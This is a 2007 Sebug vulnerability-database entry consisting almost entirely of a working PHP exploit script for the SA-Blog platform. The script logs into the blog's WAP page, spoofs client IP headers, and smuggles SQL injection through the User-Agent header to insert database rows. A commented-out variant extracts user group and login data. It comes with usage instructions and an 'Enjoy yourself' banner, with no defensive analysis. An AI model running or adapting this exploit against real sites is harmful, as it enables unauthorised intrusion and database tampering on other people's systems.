SA-Blog Exp

SSV-ID: 7276
SSV-AppDir: sablog漏洞
发布时间: 2007-09-17

测试方法:

<?php
//from    loveshell.net
$url    =    $argv[1].'/wap/index.php';
$username    =    $argv[2];
$password    =    $argv[3];


echo"    +----------------------------------------------------------------+";
echo"        Uage:    php.exe    blogurl    username    password";
echo"        example    php.exe    http://www.loveshell.net/blog    test    test";
echo"    +----------------------------------------------------------------+";


if(!$username||!$password)    die;

echo"    root@localhost:Post    our    content";

$str    =    'username='.$username.'&password='.$password.'&action=login&do=login&';

$msg    =    myrequest($str,$url);
echo    $msg;

if(strpos($msg,'登陆成功')!==false)    echo"    root@localhost:All    Done!!!    ";
else    echo"    root@localhost:Login    error!!!    ";
echo"    +----------------------------------------------------------------+";
echo"    Enjoy    yourself.";
echo"    +----------------------------------------------------------------+";


function    myrequest($msg,$url,$type=2,$cookie=''){
//change    type    for    post/get
    global    $sql;
$urls    =    initurl($url);
$iprand    =    rand(1,255).'.'.rand(1,255).'.'.rand(1,255).'.'.rand(1,255);
$fp    =    @fsockopen($urls['host'],    $urls['port'],    $errno,    $errstr,    3);
    if($fp)    {
        if($type==1){
        fputs($fp,    "GET    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Accept:    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "User-Agent:    Mozilla/4.0    (compatible;    MSIE    5.00;    Windows    98)");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Pragma:    no-cache");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cookie:    $cookie");
        }else{
        fputs($fp,    "POST    $urls[path]?$urls[query]    HTTP/1.1");
        fputs($fp,    "Accept:    application/x-shockwave-flash,    image/gif,    image/x-xbitmap,    image/jpeg,    image/pjpeg,    */*");
        fputs($fp,    "Referer:    $urls[url]");
        fputs($fp,    "Accept-Language:    zh-cn");
        fputs($fp,    "Content-Type:    application/x-www-form-urlencoded");
//        fputs($fp,    "User-Agent:    ',1),((select    concat(0x2f,groupid,0x2f,logincount)    from    angel_users    limit    1),1,1,'211.43.206.208','123");
        fputs($fp,    "User-Agent:    ',1),('9c5b71e5',1,1,'211.43.206.202','9989581653");
        fputs($fp,    "CLIENT_IP:    $iprand");
        fputs($fp,    "X_FORWARDED-FOR:    $iprand");
        fputs($fp,    "Host:    $urls[host]");
        fputs($fp,    "Content-Length:    ".strlen($msg)."");
        fputs($fp,    "Connection:    Keep-Alive");
        fputs($fp,    "Cache-Control:    no-cache");
        fputs($fp,    "Cookie:    $cookie");
        fputs($fp,    $msg."");
        }
    }


while($fp&&!feof($fp))    {
$resp    .=    fread($fp,1024);
}
return    $resp;
}


function    initurl($url)    {

$newurl    =    '';
$blanks    =    array('url'=>'');
$urls    =    $blanks;


if(strlen($url)<10)    return    $blanks;
$urls    =    @parse_url($url);
if(empty($urls)    ||    !is_array($urls))    return    $blanks;
if(empty($urls['scheme']))    return    $blanks;
if($urls['scheme']    ==    'file')    return    $blanks;

$newurl    .=    $urls['scheme'].'://';
$newurl    .=    empty($urls['user'])?'':$urls['user'];
$newurl    .=    empty($urls['pass'])?'':':'.$urls['pass'];
$newurl    .=    empty($urls['host'])?'':((!empty($urls['user'])    ||    !empty($urls['pass']))?'@':'').$urls['host'];
$newurl    .=    empty($urls['port'])?'':':'.$urls['port'];
$newurl    .=    empty($urls['path'])?'':$urls['path'];
$newurl    .=    empty($urls['query'])?'':'?'.$urls['query'];
$newurl    .=    empty($urls['fragment'])?'':'#'.$urls['fragment'];

$urls['port']    =    empty($urls['port'])?'80':$urls['port'];
$urls['url']    =    $newurl;


return    $urls;
}
?>
@Sebug.net [ 2007-09-17 ]